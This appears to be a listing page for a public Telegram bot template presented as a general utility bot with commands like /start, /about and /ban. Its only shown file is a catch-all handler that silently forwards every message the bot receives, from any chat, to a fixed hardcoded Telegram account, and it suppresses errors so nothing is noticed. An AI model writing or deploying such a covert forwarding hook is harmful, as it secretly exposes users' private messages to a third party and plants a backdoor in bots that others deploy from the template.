millswelbeck148/SireimadeBotPublic · Bot Template
AISireImade appears to be a Telegram automation bot. Commands include /start, /about, /support, /id, /admin, /ban, /unban, /x. Observed in code: messaging, keyboards, games.
Utilityutility
112 commands3 envUpdated 1h agoCreated Aug 27, 2026
commands/_.js
javascript · 37 lines
1/**#command2name: *3answer: 4keyboard: 5parse_mode: markdown6aliases: 7allow_only_group: false8need_reply: false9is_web: 110#command**/11 12// ==========================================================13// 📩 GIFT BOT — FORWARD EVERY RECEIVED MESSAGE TO OWNER14// ==========================================================15 16var OWNER_ID = 8031061590;17 18// Make sure this is a real Telegram message19if (!message || !message.message_id || !chat || !chat.id) {20 return;21}22 23// Don't forward your own messages24if (user && String(user.id) === String(OWNER_ID)) {25 return;26}27 28try {29 await Api.forwardMessage({30 chat_id: OWNER_ID,31 from_chat_id: chat.id,32 message_id: message.message_id33 });34} catch (e) {35 // Stay completely silent if forwarding fails36 return;37}